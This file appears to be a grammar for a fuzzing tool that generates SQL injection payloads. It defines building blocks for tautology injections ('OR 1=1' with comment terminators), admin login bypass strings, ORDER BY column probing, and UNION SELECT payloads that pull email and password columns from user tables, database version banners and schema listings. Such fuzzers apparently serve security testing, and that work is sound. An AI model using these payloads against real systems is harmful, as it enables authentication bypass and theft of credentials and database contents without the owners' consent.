Definition("opening_Bracket", ["("])
Definition("single_Quote", ["' "])
Definition("or", ["OR "])
Definition("condition", ["1=1","'1'='1'"])
Definition("apostrophe_OR_Space", [";"," "])
Definition("comment", ["--","#","/*"])
Definition("closing_Bracket", [")"])
grammar_input_Parser('O',"opening_Bracket")
grammar_input_Parser('C',"single_Quote")
grammar_input_Parser('C',"or")
grammar_input_Parser('C',"condition")
grammar_input_Parser('O',"apostrophe_OR_Space")
grammar_input_Parser('C',"comment")
grammar_input_Parser('O',"closing_Bracket")


Definition("administrator", ["admin","administrator","Admin","Administrator"])
Definition("single_Quote", ["'"])
Definition("apostrophe_OR_Space", [";"," "])
Definition("comment", ["--","#","/*"])
grammar_input_Parser('C',"administrator")
grammar_input_Parser('C',"single_Quote")
grammar_input_Parser('O',"apostrophe_OR_Space")
grammar_input_Parser('C',"comment")


Definition("opening_Bracket", ["("])
Definition("single_Quote", ["' "])
Definition("orderby", ["ORDER BY "])
Definition("Number", ["0","1","2","3","4","5","6","7","8","9"])
Definition("apostrophe_OR_Space", [";"," "])
Definition("comment", ["--","#","/*"])
Definition("closing_Bracket", [")"])
grammar_input_Parser('O',"opening_Bracket")
grammar_input_Parser('C',"single_Quote")
grammar_input_Parser('C',"orderby")
grammar_input_Parser('C',"Number")
grammar_input_Parser('O',"Number")
grammar_input_Parser('O',"Number")
grammar_input_Parser('O',"Number")
grammar_input_Parser('O',"apostrophe_OR_Space")
grammar_input_Parser('C',"comment")
grammar_input_Parser('O',"closing_Bracket")


Definition("opening_Bracket", ["(","["])
Definition("single_Quote", ["' "])
Definition("union_select", ["UNION select "])
Definition("Null", ["NULL"])
Definition("Comma", [","])
Definition("email", ["email"])
Definition("pass", ["pass","password"])
Definition("apostrophe_OR_Space", [";"," "])
Definition("Dual", ["from DUAL","from user"])
Definition("comment", ["--","#","/*"])
Definition("closing_Bracket", [")"])
Definition("Space",[" "])
grammar_input_Parser('O',"opening_Bracket")
grammar_input_Parser('C',"single_Quote"),
grammar_input_Parser('O',"closing_Bracket")
grammar_input_Parser('O',"Space")
grammar_input_Parser('C',"union_select"),
grammar_input_Parser('O',"Null")
grammar_input_Parser('O',"Comma")
grammar_input_Parser('O',"email")
grammar_input_Parser('O',"Comma")
grammar_input_Parser('O',"pass")
grammar_input_Parser('O',"Comma")
grammar_input_Parser('O',"Null")
grammar_input_Parser('O',"Comma")
grammar_input_Parser('O',"Dual")
grammar_input_Parser('O',"apostrophe_OR_Space")
grammar_input_Parser('C',"comment"),
grammar_input_Parser('O',"closing_Bracket")


Definition("opening_Bracket", ["("])
Definition("single_Quote", ["' "]),
Definition("union_select", ["UNION select "])
Definition("Null", ["NULL"])
Definition("Comma", [","])
Definition("string_Check", ["a"])
Definition("Version_OR_Database_Content", ["@@version","version()","version FROM v$instance","banner FROM v$version","* FROM all_tables","* FROM information_schema.tables","* from users","* from user"])
Definition("apostrophe_OR_Space", [";"," "])
Definition("comment", ["--","#","/*"])
Definition("closing_Bracket", [")"])
grammar_input_Parser('O',"opening_Bracket")
grammar_input_Parser('C',"single_Quote")
grammar_input_Parser('C',"union_select")
grammar_input_Parser('O',"Version_OR_Database_Content")
grammar_input_Parser('O',"apostrophe_OR_Space")
grammar_input_Parser('C',"comment")
grammar_input_Parser('O',"closing_Bracket")